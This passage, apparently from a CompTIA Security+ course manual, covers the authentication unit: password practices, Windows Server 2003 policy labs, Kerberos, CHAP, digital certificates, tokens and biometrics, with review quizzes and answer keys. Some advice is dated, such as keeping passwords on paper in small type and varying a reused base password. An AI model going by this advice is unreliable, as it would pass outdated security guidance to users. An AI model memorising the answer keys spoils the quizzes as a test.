Data that has been scrambled for remote transmission

C Data that is secured so only the intended people have access D Data that can be accessed when it is needed

21

Unit 2 Authentication
Unit time: 120 minutes Complete this unit, and youll know how to:
A Create strong passwords and store them

securely.
B Discuss the Kerberos authentication

process.
C Explain how CHAP works. D Explain how digital certificates are created

and why they are used.


E Discuss what tokens are and how they

function.
F Explain the biometric authentication

processes.

22

CompTIA Security+ Certification

Topic A: Introduction to authentication


This topic covers the following CompTIA Security+ exam objectives:
# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication Username/Password 1.3 Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols

Authentication
Explanation Security of system resources generally follows a three-step process of authentication, authorization, and accounting (AAA). This AAA model begins with positive identification of the person or system seeking access to secured information or services (authentication). That person is granted a predetermined level of access to the resources (authorization), and the use of each asset is then logged (accounting). The most critical step in the process is authentication. Without a positive identification, other steps are worthless, because they cannot distinguish between the authorized user and an imposter. The amount of security implemented in the authentication process should be proportional to the value of the resources being protected. As our dependence on computer network systems has increased, so has our willingness to pay for stronger authentication technologies to secure against attack.

Usernames and passwords


Secret passwords have been used for millennia to gain access to otherwise forbidden places. They have been as simple as open sesame and as demanding as the exact words to a very long poem. In todays computing environment, they are the prevailing means of authentication. Usernames A username is a unique identifier that we use to identify ourselves to a computer or network system when we log on. It is usually constructed of easily remembered characters. The username and password together allow for a users authentication. The username should be treated as an equal part of the authentication key and held in similar confidence to the password. Not keeping your username secret can provide a potential hacker with half the information needed to masquerade as you obtain the use of all your system rights and privileges. Passwords A password is a secret combination of key strokes that, when combined with your username, authenticates you to the computer or network system. In terms of authentication, it is something that we know, rather than something we own or a part of who we are, such as key card or a fingerprint. We are required to use many different passwords, so we tend to prefer short, easy-to-remember passwords because longer passwords take too long to type, and more complex passwords are more difficult to remember.

Authentication

23

With increasing numbers of sites requiring authorization, users often choose to reuse the same simplistic password on multiple sites, aggravating the vulnerabilities of the authentication keys of which such passwords are a part. Password protection guidelines The proliferation of computing has led to the use of weak personal password techniques. These weak techniques are the crux of the problem with passwords. We are now operating in a digital environment in which the bad guys are using faster and more capable computers and applications to violate our computer systems, because of this, we need to more carefully construct, use, and store our passwords. There are many different password conventions, but, there are five basic rules to follow in order to safeguard your passwords: Passwords must be memorized. If they must be written down, the written records must be locked up. For multiple applications, each password you choose must be different from any other you use.
Some operating systems such as NetWare do not recognize the difference between upper and lower case letters.

Passwords must be at least six characters long, and preferably longer, depending on the size of the character set used. Passwords must contain a mixture of letters (both uppercase and lowercase) if the operating system supports case-sensitive passwords, numbers, and other characters, such as %, !, or &. Passwords must be changed periodically. Strong password creation techniques It is important to choose passwords that are easy to remember but difficult to recognize. One way to do this is to think of a simple phrase or words to a song that can be easily remembered, such as, April showers bring Might flowers. Use the first letters of each word and add a number and a punctuation mark or another character, which might give youAsb4Mf? Another technique is to combine two dissimilar words and place a number between them, such as SleigH9ShoE. One can also substitute numbers for letters, but this should be done carefully. Replacing the words to and for with their numeric synonyms, 2 and 4 is a fairly obvious ploy to most hackers. An all too frequent example of this simple substitution process is pa55w0rd. A five is just a reformatted S, and zero could easily be the letter O. Most password cracking utilities check for these types of well-known substitutions. The key is that your password means something to you and that it creates a strong password, one that cannot be easily guessed or quickly discovered using a brute force attack (the process of systematically trying every single possible combination of characters until the correct combination is determined). Techniques to use multiple passwords People often have access to many different systems, each requiring a username/password set. It is recommended that you use a different password every time one is required, but you can also group different Web sites or applications by their appropriate level of security and use a different password for each of those groups while taking care to actually use a different password for each of the more critical Web sites (for example., those of financial institutions) and applications (for example, financial software).

Have each student devise a strong password and write it down on a piece of paper along with their name. Collect the papers and after several more minutes of discussion, have each student recall their password. You be the judge as to whether the password qualifies as strong.

24

CompTIA Security+ Certification For example, one lower-level group might make up the various news and weatherrelated Web sites you visit. If someone were to obtain your password to these sites, it would do you no real harm. Another method is to cycle your more complex passwords down the groups, from most sensitive to least. This allows you to reduce the total number of passwords that you are using while giving you time to work with a given password (and remember it) before relegating it for use in the more insecure password entry fields that you might encounter. You might also try using a common password base, but change parts of the password depending on where you are required to use it. For example, you could take the password ToRn71@L (sort of like torrential) and depending on the Web site change the T, R, and L to NoYn71@T for the New York Times Web site and SoAn71@N for the SANS Institute Web site. Storing passwords If you must write a list of your various passwords down on paper, keep the piece of paper close to you in an item that you are not likely to lose sight of, such as a purse or wallet. These passwords should be written in very small type to minimize someone else reading the information. Another good practice is to develop a personal code to apply to your password list. For instance, the first three characters of each password might be transposed and moved to the end of the password string, and the hostname might be moved down one place in the list, lining it up with a password for a different server. The individual who owns this written password card would have no problem quickly decoding the information to enter, but it adds a small delay for anyone who would maliciously use the information. If you keep this list electronically, encrypt the password list with Windows 2000/Server 2003/XP encryption or some application that is specifically designed for this purpose. Password protect the encrypted file with a strong password (different from your login password) and never electronically store the password that gains access to the file.

The RunAs service


RunAs allows an administrator to log on with a standard user account and still run administrative programs with administrative rights. Those rights are only applied to the application, so viruses, worms, and Trojan Horses cannot access the network with administrative privileges. To activate RunAs, press Shift and then right-click an application, shortcut or service. Provide the appropriate administrator credentials and click OK. This way, you can, for example, check e-mail and perform necessary management tasks without actually being logged on as administrator. At the same time, having RunAs available makes it possible for regular users to access the network with administrative privileges should they know the logon credentials of an administrative user. To prevent users from using the RunAs service, you can disable it. Notice that you shouldn't use RunAs to run certain applications, such as word processing applications. Setting login policies in Windows Server 2003 Windows Server 2003 provides several safeguards to discourage hackers from attacking your network. These include the following: Removing the name of the last user to logon to the system. Without an account name, the hacker will have an extra step to complete before gaining access to the system.

Authentication

25

Specifying a minimum length for passwords. Short passwords or blank passwords are easy to crack. Setting the password complexity to require use of at least three of the following: one number, one uppercase letter, one lowercase letter, or one symbol. Combining password length with complexity is a recommended method of security professionals. Implementing an account lockout policy. The account lockout policy will disable an account for a specific amount of time after a certain number of failed logon attempts. To prevent display of the last logon name in Windows Server 2003, modify the local security policy and change the Interactive logon: Do not display last user name option to Enabled. Do it!

A-1:

Preventing the display of the last logon name Heres why

Heres how
1 Log on to the Windows Server 2003 server as Administrator 2 Click Start Choose Administrative
Tools, Local Security Policy

The Local Security Settings window appears.

3 Expand Local Policies

4 Select Security Options 5 Double-click Interactive


logon: Do not display last user name

6 Select Enabled Click OK 7 Close all windows and log off 8 Press c + a + d
Notice the User name field is empty in the logon screen.

26

CompTIA Security+ Certification

Minimum password lengths


Explanation To specify a minimum length for passwords in Windows Server 2003, modify the local security policy and change the Minimum password length option.

Do it!

A-2:

Using the Windows Server 2003 local password policy settings for length Heres why

Heres how
1 Log on to the Windows Server 2003 server as Administrator 2 Click Start Choose Administrative
Tools, Local Security Policy

To access the Local Security Settings window.

3 Expand Account Policies 4 Select Password Policy 5 Double-click Minimum


password length To start the process of changing the default password policy.

Change the characters value to 9 6 Click OK 7 Close all windows and log off 8 Log on as User1 9 Press c + a + d
Tell students this step is not meant to be successful.

The user does not yet require a password to log on.

10 Click Change Password In both the New Password and Confirm New Password text boxes, type a new password of less than 9 characters Click OK
A message stating your password must be at least 9 characters long cannot repeat any of your previous 0 passwords and must be at least 0 days old appears. To change the password.

11 Assign password1 as the new password 12 Click OK 13 Log off

Authentication

27

Password complexity
Explanation Finally, to set the password complexity in Windows Server 2003, modify the local security policy and change the Passwords must meet complexity requirements option.

Do it!

A-3:

Using the Windows Server 2003 local password policy settings for complexity Heres why

Heres how
1 Log on to the Windows Server 2003 server as Administrator 2 Click Start Choose Administrative
Tools, Local Security Policy

To access the Local Security Settings window.

3 Expand Account Policies 4 Select Password Policy 5 Double-click Password must meet complexity requirements Select Enabled 6 Click OK 7 Close all windows and log off 8 Log on as User1 9 Press c + a + d 10 Click Change Password

(If necessary.) (If necessary.)

In the Old Password box, type password1 In the New Password box and Confirm New Password box, type password321
Review the entire message with your students.

11 Click OK 12 Assign Password1 as the new password

A message box appears, indicating restrictions and steps for completing the password change. The password change is successful. Changing the p in password to a capital P caused the password to meet the password complexity requirements.

13 Log off User1

28

CompTIA Security+ Certification

Topic B: Kerberos
This topic covers the following CompTIA Security+ exam objective:
# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication Kerberos Mutual

Introducing Kerberos
Explanation In 1983, researchers at the Massachusetts Institute of Technology (MIT) started a fiveyear project to incorporate computers into the MIT curriculum. As part of the project, a leading edge network authentication protocol was developed. It was named Kerberos, after the three-headed dog that guarded the entrance to Hades in Greek mythology. In 1989, version 4 was publicly released in open source code. Although Kerberos 4 is still in use in a few environments, Kerberos 5 is the standard today. As of this writing, the latest version is Kerberos 5-1.4.2. Kerberos is freely available to anyone in the U.S. and Canada from the following Web page:
itinfo.mit.edu/product.php?name=Kerberos

Point out that Kerberos 5 is the current standard today. Point to the Web site where Kerberos security is freely available.

Kerberos provides a means to authenticate users and services over an open multiplatform network using a single login procedure. After the user is authenticated by the system, all subsequent commands and transactions can be carried out securely without any prompting for a password.

Authentication

29

Terminology
The Kerberos system consists of the following components: Principal Any uniquely-named client or server to which Kerberos can assign tickets. Authentication Server (AS) A network service that authenticates users or services, then supplies ticket-granting tickets to the authorized user or service. Ticket-Granting Server (TGS) A network service that supplies temporary session keys and tickets to authorized users or services. Key Distribution Center (KDC) A server running both AS and TGS services: services both initial ticket and ticket-granting ticket requests. Realm An organizational boundary that is formed to provide authentication boundaries. Each realm has an Authentication Server and a Ticket-Granting Server. Remote Ticket-Granting Server (RTGS) A remote realms TGS. The following terms describe types of data that are passed over the network during Kerberos processing: Credentials A ticket for the resource server plus a temporary encryption key (session key). Session key A temporary encryption key used between the client and resource server, with a lifetime limited to the duration of a single login session. Authenticator A record containing information that can be shown to have been recently generated using the session key known only by the client and server. The authenticator is typically valid for five minutes and cannot be reused. Ticket A record that helps a client authenticate itself to a server; it contains the clients identity, a session key, a timestamp, and checksum, all sealed using the resource servers secret key. Ticket-Granting Ticket (TGT) A ticket that is granted as part of the Kerberos authentication process and used to obtain other tickets from the TGS.

210

CompTIA Security+ Certification

How it works
Kerberos uses encryption technologies to pass a users credentials over unsecured channels and validate the user for network resources. The process, pictured in Exhibit 21, is as follows: 1 When Maria logs on to her workstation with her username and password, the workstation automatically sends a request to the Authenticating Server (AS) for a Ticket-Granting Ticket (TGT). The AS has a database listing the valid users and servers within the scope of its authority (realm) and their master keys. 2 The AS receives the request for a TGT, authenticates Maria, uses her master key to encrypt a new TGT, and sends it back to Marias workstation. Now that she has a TGT, she does not have to keep authenticating herself to gain access to additional services, at least until the TGT expires. (The TGT is valid for the duration of the logon session, as configured in the account security policy, or until the user disconnects or logs off.) 3 Whenever Maria needs a new service, her workstation sends a copy of the TGT, along with the name of the server that holds the application she needs, an authenticator, and the time period that she needs access to each service, to the ticketgranting server (TGS) requesting a ticket for each of the services she needs. 4 Once the TGS has verified that Maria is in fact who she says she is, using the session key to access her authenticator, and assuming the TGT matches her to her authenticator, the TGS sends her tickets to use the services she needs. 5 After receiving the appropriate tickets from the TGS, Marias workstation verifies that each one is for a service that she originally requested, and sends a ticket to each relevant server requesting permission to use their services. 6 Each of the servers that receive a request for service verifies that the request came from the same person, or machine, to which the TGS granted the ticket. As each server determines that Maria has the authority to use the service requested it authorizes her to begin using those services. The TGT must be submitted each time Maria needs additional services. Each time the validity period for using previously requested service expires, an entirely new TGT must be obtained.

Authenticating Server 1 2

3 4

Client 5 6

Ticket-Granting Server

Resource Server

Exhibit 2-1: Kerberos authentication process

Authentication

211

Using Kerberos in very large network systems


Previously, we discussed the process by which Kerberos uses an AS, TGT, and a TGS to streamline the authentication process. This is useful in environments that have many users and services on the network; however, in the case of very large organizations, the computer network can encompass many different organizational boundaries, whether they are geographical or functional, and serve thousands of users. In such a system, it would not make sense for each user to go through a single AS and TGS. In very large organizations, Kerberos employs multiple authentication servers, each of which is responsible for a subset of users and servers in the network system. Each of these subsets has its own AS and TGS and is called a realm. Cross-realm authentication must occur in order for a client to use a service that is running in a realm other than its own. Kerberos uses a hierarchical organization to accomplish this, much as a network administrator uses hierarchical IP addresses to identify subnetworks within a large system. The process for cross-realm authentication is as follows: 1 The client contacts its local TGS, requesting permission to access a service in a remote realm. 2 The TGS returns a remote TGT. The token does not provide access to any specific remote TGS or service; it simply informs other TGSs that the user has been authenticated. 3 The client presents the remote TGT to the remote TGS requesting access to a service within its realm. 4 The RTGS checks the users credentials and establishes a session key. It returns the session key to the client. 5 The client submits the session key to the RTGS to use its services. 6 The remote resource server checks the users credentials and allows access to the service.

Authenticating Server 1 2

3 4

Client 5 6

RTGS

Cross-Realm Server

Exhibit 2-2: Cross-realm authentication For more information about Kerberos, including initial, preauthentication, invalid, renewable, postdated, proxiable, and forwardable tickets, see RFC 1510. RFCs can be found at the following Web page:
http://www.faqs.org/rfcs/rfc-index.html

212

CompTIA Security+ Certification

Security weaknesses of Kerberos


Kerberos does a good job of authenticating an individual users right to access a network resource, however, Kerberos does have the following vulnerabilities: Password-guessing attacks are not solved by Kerberos. An attacker can use a dictionary attack to decrypt a key if a user chooses a weak password. Kerberos assumes that workstations, servers, and other devices that are connected to the network are physically secure, and that there is no way for an attacker to gain access to a password by establishing a position between the user and the service being sought. You must keep your password secret. If you share your password with untrustworthy individuals, or send the password in plain text e-mail, or write your password on the bottom of your keyboard, then an attacker can easily gain access to services that are supposed to be available only to you. Denial-of-service attacks are not prevented by Kerberos. The internal clocks of authenticating devices on a network must be loosely synchronized in order for authentication to properly take place. The authentication server (AS), and any other server that maintains a cache of master keys, must be secure. If an attacker gains access to the AS then he or she can impersonate any authorized user on the network. Authenticating device identifiers must not be recycled on a short-term basis. For example, a particular user is no longer a part of the network, but is not removed from the access control list (a manually configured list that limits access to network resources to authorized users only). If that users principal identifier is given to another user, then the new user has access to the same network services as the original user.

Mutual authentication
Mutual authentication is the process by which each party in an electronic communication verifies the identity of the other. For instance, a bank clearly has an interest in positively identifying an account holder prior to allowing a transfer of funds; however, you as a bank customer also have a financial interest in knowing your communication is with the banks server prior to providing your personal information. Kerberos allows a service to authenticate a recipient so that access to the service is protected. Conversely, it allows the recipient to authenticate the service provider so rogue services are blocked.

Authentication Do it!

213

B-1:

Discussing Kerberos

Questions and answers


1 What are some vulnerabilities in Kerberos security?
Unsecured or weak passwords Physically accessible workstations and servers Vulnerable to denial-of-service attacks Recycled SIDs

2 A subset of users in a very large system employing Kerberos is called a: A B C


D

Peer Client Server Realm

3 In very large organizations, Kerberos employs multiple authentication servers, each of which is responsible for a subset of users and servers in the network system. True or false?
True

4 Which of the following is/are not true in a Kerberized system? A B


C

Once the user has been authenticated, the AS sends the user a ticket-granting ticket (TGT). Once the client has received a TGT, the client presents it to the TGS in order to receive a session key for each requested service. Once the client receives the appropriate ticket from the TGS, the client submits a request to the authentication server.

5 How long is a timestamp valid in a Kerberos authenticator? A B C


D

Eight hours One hour Twenty minutes Five minutes Two minutes

214

CompTIA Security+ Certification

Topic C: Challenge Handshake Authentication Protocol


This topic covers the following CompTIA Security+ exam objective:
# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication CHAP

Introducing CHAP
Explanation The Challenge Handshake Authentication Protocol (CHAP) is an authentication scheme used by Point-to-Point Protocol (PPP) servers to validate the identity of the remote client at the beginning of the communication session or any time throughout the session.

The CHAP challenge-and-response sequence


After a link is established between the peer and authenticating server, CHAP applies a three-way handshake procedure as follows: 1 The authenticating server sends a challenge message to the peer. 2 The peer responds with a value that has been calculated using a one-way hash function (an algorithmic function that takes an input message of arbitrary length and returns an output of fixed length). 3 The authenticating server receives the response and checks it against its own calculation of the expected hash value. The authenticating server must respond to the peer with either a success or a failure message. The connection is terminated if the values do not match. 4 The authenticator sends a new challenge to the peer at random intervals throughout the session to make sure it is still communicating with the same peer.

1. Challenge message 2. Response hash 3. Success or failure

Authenticating Server

Peer

Exhibit 2-3: CHAP challenge-and-response process

Authentication

215

CHAP protects against playback attacks by changing the content of the challenge message with each authentication request. The challenge can be repeated at unpredictable intervals while the connection is open, limiting the time of exposure to any single attack, and the server is in control of the frequency and timing of the challenges. For further information on CHAP, see the following Web page:
http://www.ietf.org/rfc/rfc1994.txt

Do it!

C-1:

Reviewing the Kerberos handshake

Questions and answers


1 Put the following steps in the proper sequence. ___ The authenticator sends a new challenge to the peer at random intervals throughout the session to make sure that it is still communicating with the same peer. ___ The peer responds with a hash value. ___ The authenticating server sends a challenge message to the peer. ___ The authenticating server checks the response against its own calculation of the expected hash value. ___ The authenticating server responds with either a success or a failure message.
5

2 1 3

2 CHAP protects against ___________ attacks by changing the content of the challenge message with each authentication request.
playback

216

CompTIA Security+ Certification

Topic D: Digital certificates


This topic covers the following CompTIA Security+ exam objectives:
# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication Certificates 4.1 Be able to identify and explain the of the following different kinds of cryptographic algorithms Symmetric Asymmetric 4.3 Understand and be able to explain the following concepts of PKI (Public Key Infrastructure) Certificates

Introducing digital certificates


Explanation Digital certificates are used to authenticate a persons or an organizations identity on the Internet. They are used in a variety of transactions including e-mail, electronic commerce, and the electronic transfer of funds. Digital certificates provide individuals and organizations with a means of privately sharing information so each party is confident that the individual or organization with which they are communicating is in fact who it claims to be. In order to be sure this is true, its necessary to involve a third, trusted party to legitimize, or pre-qualify, individuals and organizations.

Electronic encryption and decryption concepts


Before digital certificates are discussed in detail, its important to understand some basic concepts about cryptography. In simple terms, encryption is the process of converting a plain text message into a secret message; decryption reverses the process and converts a secret message into a plain text message. There are two basic types of ciphers (techniques that are used for encryption and decryption), symmetric ciphers and asymmetric ciphers: Symmetric ciphers use the same key to both encrypt and decrypt a message. Although symmetric encryption algorithms are computationally more efficient, there is a risk that an unintended party could stage an attack if they intercepted the key as it was passed between the sender and the receiver. Asymmetric ciphersrequire one key to be used to encrypt the message and a different key to be used to decrypt it. The keys are different, but they act as a pair. When you create the key pair, one of the keys is designated as the private key, which is sometimes referred to as a secret key, and the other is designated as the public key. As asymmetric ciphers require two different keys, they are typically more secure, if more complex, than symmetric ciphers. Private keys can be held by individuals or groups of individuals that are part of a predefined group.

Authentication

217

Public key system


A message encrypted by one key in a key pair might be decrypted using the other. This is part of what is called a public key system. You keep your private key private and you share your public key with anyone you wish. This way the private key or the algorithm upon which it is based is not compromised. This means that anyone can use the public key to send an encrypted message, but only the private key holder(s) can decrypt it. The following example of an encrypted communication between Alice and Bob illustrates this concept. Alice and Bob have never before communicated with each other. When Alice and Bob want to communicate with each other, they can share their plaintext public keys with each other over an insecure line. If Alice uses Bobs public key to encrypt a message to him, only Bob can decrypt it using his private key, and vice versa. If, however, both Bob and Alice have published their public keys online, how does Bob know its actually Alice who sent him the message, and not some other person who accessed his public key claiming to be Alice? Alices identity can be verified if she notarizes the message with a digital certificate issued by a certification authority. A certification authority (CA) is a third-party entity that verifies the actual identity of an organization or individual before it provides the organization or individual with a digital certificate, much the same way that a state provides a business with a business license, or a national government provides a citizen with a passport. A certificate is only issued after careful verification of an individuals or organizations identity using the appropriate documentation. The digital certificate typically consists of the owners public key and name, the expiration date of the public key (which is usually only valid for one year), the name of the CA that issued the digital certificate, the serial number of the digital certificate, and the digital signature of the CA.

How much trust should one place in a CA?


Referring back to our previous example, now that Bob has received a message from Alice (signed with a digital certificate and authenticated by a certificate authority), does this mean Bob can now trust that the sender was actually Alice and not an imposter? It all depends on how much he trusts the CA. It is possible that the CA did not do its homework and did not receive enough information from the person who applied for a digital certificate using Alices name to guarantee that person actually was Alice. Serving digital certificates is no longer a complex or expensive process. In fact, Windows Server 2003 comes with a certificate server.
Assure students certificates will be revisited several times in different contexts during the course, so they will have many opportunities to understand this concept.

Popular and usually more reputable CAs, such as VeriSign, have several levels of authentication that they issue, based on the amount of data they collect from their applicants. An applicant must usually show up in person to show the companies the required documentation to be granted the highest level. Less proof is required to receive lower levels of authentication. This means that if a CA wants to succeed in the marketplace they must be very careful when granting higher levels of authentication. It also means that people need to check the digital certificates they receive from other people and organizations to make sure that a reputable CA issued them. Digital certificates are proving themselves very useful on the Internet because they provide a safe and secure means of digital authentication.

218
Do it!

CompTIA Security+ Certification

D-1:

Discussing digital certificates

Questions and answers


1 Asymmetric ciphers require a public key to encrypt a message and a ______________ to decrypt it.
private key

2 A trusted, third-party entity that verifies the actual identity of an organization or individual before it provides a digital certificate is called a: A B
C

Cross-realm authentication Digital signature Certification authority

3 Symmetric ciphers use the same key to both encrypt and decrypt a message. True or false?
True

4 Digital certificate consists of which of the following? (Choose all that apply.)
A

The certificate owners public key The certificate owners signature The certification authoritys signature The expiration date of the public key

B
C D

5 What is the purpose of the digital certificate?


To authenticate a persons or organizations identity on the Internet

Authentication

219

Topic E: Security tokens


This topic covers the following CompTIA Security+ exam objective:
# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication Tokens

Introducing security tokens


Explanation A security token is an authentication device that has been assigned to a specific user by an appropriate administrator. Security tokens come under the something you have category of authentication. Usually security tokens are small, credit card-sized physical devices you can carry around, although there are some software-based security tokens that can reside on your workstation. Most security tokens also incorporate two-factor authentication methods to work effectively. That means you must possess both the correct password (something you know) and the correct token (something you have) to gain access to the resources you are seeking. There are two types of security tokens: passive and active. Although both possess a base key, the passive token simply acts as a storage device for the base key, and the active token can provide variable outputs in various circumstances. One of the best qualities of either a passive or active token is that they can utilize base keys that are much stronger than the relatively short and simple passwords that a person can remember. Tokens provide you and the system in which you are operating with very strong authentication tools. The downside to tokens of course, like your car keys, is that if you lose them, you cannot get into your computer system.

Introduce the concept of something you have versus something you know as it applies to authentication. A security token is like having an ATM card that allows you to begin transactions at automatic teller machines. You must also know the PIN in order to complete the transaction.

Passive tokens
Passive tokens simply act as storage devices for base keys. They share their keys by various means: notches on the token match a receiving device, magnetic strips transmit the key by using a card reader; optical bar codes are read by a scanner, and so on. The most common passive tokens are plastic cards with magnetic strips embedded in them. ATM cards, credit cards, card keys that open electronic door locks, and other types of these keys are everywhere today. They are cheap to manufacture and read, and are easy to carry, but unfortunately, they are also more easily copied than other types of tokens. This is why many of these types of tokens require that a PIN be produced along with the card. These PINs, like passwords typed into a computer, can be easily gained by someone glancing over your shoulder.

Active tokens
Unlike a passive token, an active token does not emit or otherwise share its base token. Instead, it actively creates another form of the base keysuch as a one-time password or an encrypted form of the base keythat is not subject to attack each time the owner tries to authenticate.

220

CompTIA Security+ Certification Originally these types of tokens required the user to read a value and type it into the computer using their keyboard. Increasingly common are tokens that plug directly into the computer. Some examples of this are smart cards, PCMCIA cards, USB tokens, and others that require a proprietary reader. In particular, smart cards offer many advantages and are gaining in popularity. A smart card is a plastic card, about the same size as a credit card, which has an embedded chip with an integrated circuit that provides either memory or memory along with a programmable microprocessor. Smart cards come in different formscontact, contactless, or hybridwhich can either be plugged into a device, or not, to work. Depending on the amount of memory and the type of microprocessor they have, smart cards can perform a multitude of functions. They can act as an employee badge, a credit card, an electronic building key, or some other access-granting certificate. They can also securely store personal information, such as biometric information, multiple username/password combinations, and individual health records, digital certificates, and private/public key infrastructure (PKI) keys.

One-time passwords
A one-time password is a password that is used only once for a very limited period of time and then is no longer valid. If it is intercepted at any point though, it becomes useless almost immediately. One-time passwords are typically generated using one of two strategies: by employing counter-based or clock-based tokens. A counter-based token is an active token that produces one-time passwords by combining the secret password with a counter that is synchronized with a counter in a server. Normally, you obtain the fresh password by pressing a button on the front of the token. A clock-based token is an active token that produces one-time passwords by combining a secret password with an internal clock. Both of these methods employ means to resynchronize the tokens counter or clock if they vary too much from the corresponding servers counter or clock. Although one-time password technologies significantly reduce the risk of attacks relative to static password technologiesthey are still open to certain kinds of attack, such as phone line redirection attacks (which divert an authenticated connection to capture transmitted data), IP address theft, and man-in-the-middle attacks.

Authentication Do it!

221

E-1:

Discussing tokens

Questions and answers


1 An active token does not emit or otherwise share its base token. True or false?
True

2 A passive token holds a microchip in order to perform a function or calculation on the base key information. True or false?
False: This describes an active token.

3 Explain the difference between counter-based and clock-based tokens.


Counter-based tokens produce one-time passwords by combining the secret password with a counter that is synchronized with a counter in a server; clock-based tokens produce onetime passwords by combining a secret password with an internal clock that is synchronized with the servers clock.

222

CompTIA Security+ Certification

Topic F: Biometrics
This topic covers the following CompTIA Security+ exam objectives:
# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication Multi-factor Biometrics 5.1 Understand the application of the following concepts of physical security Access Control Biometrics

Introducing biometric authentication


Explanation Biometric authentication is based upon an individuals unique physical or behavioral characteristics. Physical characteristics that are commonly measured include fingerprints, hand geometry, retinal and iris patterns, and facial characteristics. Behavioral characteristics that are commonly measured include handwritten signatures and voice. Biometrics is the most secure form of authentication because it relies on measuring who an individual is, rather than what they know or what they have. Furthermore, biometric authentication is the most convenient type of authentication because the person need not remember anything or carry anything with them. This section examines how a biometric authentication system works, how each of the physical and behavioral characteristics is measured, the strengths and weaknesses associated with those measurements, and the general trends and issues associated with biometric authentication as a whole.

Working of a biometric authentication system


The process by which a biometric authentication system works is outlined in the following steps. The first four steps of this process are used to collect initial biometric measurements of an individual. Steps five through eight in the following list correspond to the authentication process that takes place when that individual needs to be authenticated to access a restricted area, whether that area is a room in a building or a computer/network resource. 1 Your identity is verified using acceptable forms of identification, such as a drivers license, passport, or company identity badge. 2 Your chosen biometric (fingerprint, iris features, handwritten signature, and so on) needs to be scanned for the first time. 3 The biometric information must then be analyzed by a computer and put into an electronic template. 4 The template is then stored in some kind of repository (a local repository, a central repository, or a portable token such as a smart card). 5 When you wish to gain access to restricted areas of a building or computer system, your chosen biometric must be scanned again.

Authentication

223

6 A computer then analyzes the biometric data and compares it to the data stored in the preexisting template. 7 If the data provided by the current biometric scan sufficiently matches the data stored in the preexisting template, then the person is allowed access to the restricted area. 8 Following the authenticate, authorize, and audit (AAA) model introduced at the beginning of this unit, a record of the authentication should be kept so that an access audit can be performed later.

False positives and false negatives


Although biometric authentication is generally considered the most accurate of all authentication methods, it is not perfect. Unauthorized people are sometimes authenticated when they should not be and authorized people might be rejected even though they are actually who they claim to be. As mentioned previously, during the biometric authentication process, a persons current biometric data is compared to a preexisting template of the original biometric data. System administrators have the ability to set the degree to which the two should match in order for a person to be authenticated by the system. System administrators generally require higher degrees of similarity between the current and preexisting biometric data in highly secure environments and lower degrees of similarity in environments that are deemed less sensitive. False positive results When an unauthorized person is wrongly authenticated by biometric means, it is referred to as a false positive result. The likelihood of this happening is increased when the biometric data-matching standards are set too low. This can occur when the administrator does not place the need for security above users general frustration at having to repeatedly have their biometric data scanned when wanting to gain access to a restricted area. A false positive result can also occur when there is a desire to move many people through the scanning process in a short period of time, such as when biometric authentication of fingerprints are used to allow many employees to enter the building at the beginning of each work period. False negative results When an authorized person is not authenticated by biometric means and they are actually who they claim to be and they have the authority to gain access to a restricted area, it is referred to as a false negative result. This can occur when the biometric being measured has changed for some reason since the initial scan was taken. For example, if a man has grown or shaved off a beard, his current biometric data can differ greatly from that which was gathered during the initial scan. False negatives can result in lost productivity when employees cannot gain access to the resources they need to perform their job duties. They can take up valuable time of network administrators to rectify the problem, and finally, they cause a great deal of frustration for the person who is authorized, but unable, to access certain crucial areas.

224

CompTIA Security+ Certification

Different kinds of biometrics


The following sections on physical and behavioral characteristics highlight what is being measured during the various types of biometric authentication procedures and the basic strengths and weaknesses of each. Physical characteristics Physical characteristics are those that are actually part of a person, such as the patterns found on their fingerprint or iris, or the size of the various parts of their hand. Fingerprints A fingerprint scanner looks at the patterns found on the surface of a fingertip. It is the oldest and most widely deployed biometric technology. Because of this, prices of these devices (shown in Exhibit 2-4) are relatively low.

Exhibit 2-4: Fingerprint scanner by DigitalPersona A fingerprint scanner can be deployed in a broad range of environments; it provides flexibility and increased system accuracy by allowing users to enroll multiple fingers in the template system. Its weaknesses include the fact that it might not work properly if the fingertip or the device sensor is dirty, and that it is associated with criminality. Hand geometry Hand geometry authentication involves the measurement and analysis of different hand measurements. This biometric is relatively easy to use; moreover, simple integration into other systems and processes combined with an ability to scan people quickly and easily, makes this a popular choice for many companies. Relative to other biometrics, it has limited accuracy due to the relatively common measurements of peoples hands. Furthermore, a hand-scanning device (shown in Exhibit 2-5) is rather large and is unsuitable for cramped locations.

Authentication

225

Exhibit 2-5: Hand geometry scanner: HandkeyII by Recognition Systems Inc. Retinal scanning Retinal scanning involves analyzing the layer of blood vessels located at the back of the eye. This method is highly accurate, is very difficult to spoof, and measures a stable physiological trait. Its difficult to use because it requires the user to focus on a specific point in a receptacle (shown in Exhibit 2-6), and like a hand scanner, it is a relatively large device that would not work well in many situations. This is very expensive technology and might be appropriate only in very high-security areas.

Exhibit 2-6: Retinal scanner by Eyedentify Inc.

226

CompTIA Security+ Certification Iris scanning Iris scanning involves analyzing the patterns of the colored part of the eye surrounding the pupil. It uses a relatively normal camera (shown in Exhibit 2-7) and does not require close contact between the eye and the scanner. Glasses can be worn during an iris scan, unlike a retinal scan. Template matching rates for this technology are very high; however, ease of use is still not very high compared to other methods.

Exhibit 2-7: Iris scanner by Panasonic Authenticam Facial scanning Facial scanning biometrics involves analyzing facial characteristics. It is a unique biometric in that it does not require the cooperation of the scanned individual: it can utilize almost any high-resolution image acquisition device such as a still or motion camera. Although this discussion is primarily concerned with the use of facial scanning to authenticate people trying to gain access to electronic resources, some government agencies are increasingly interested in using publicly placed cameras and driver license photos to help identify and track criminals and terrorists. Weaknesses in this system include the fact that scanning capabilities can be reduced in low light, facial features can change over time, and there are some concerns about the use of this technology on unsuspecting people who do not know they are being scanned. Behavioral characteristics Behavioral characteristics are those that are exhibited by an individual, such as the way a person signs her name or speaks a predetermined phrase, rather than characteristics that are actually a part of the physical makeup of that person, such as a fingerprint or the patterns of the iris or retina. Handwritten signature verification analyzes the way people sign their name, such as speed and pressure, as well as the final static shape of the signature itself. Signature scanning (Exhibit 2-8) is relatively accurate and, of course, people are already familiar with it as a form of authentication, which means they might not feel as invaded using this technology as they might with a fingerprint scan. A major weakness in this method is not with the technology, but with the user. Most people do 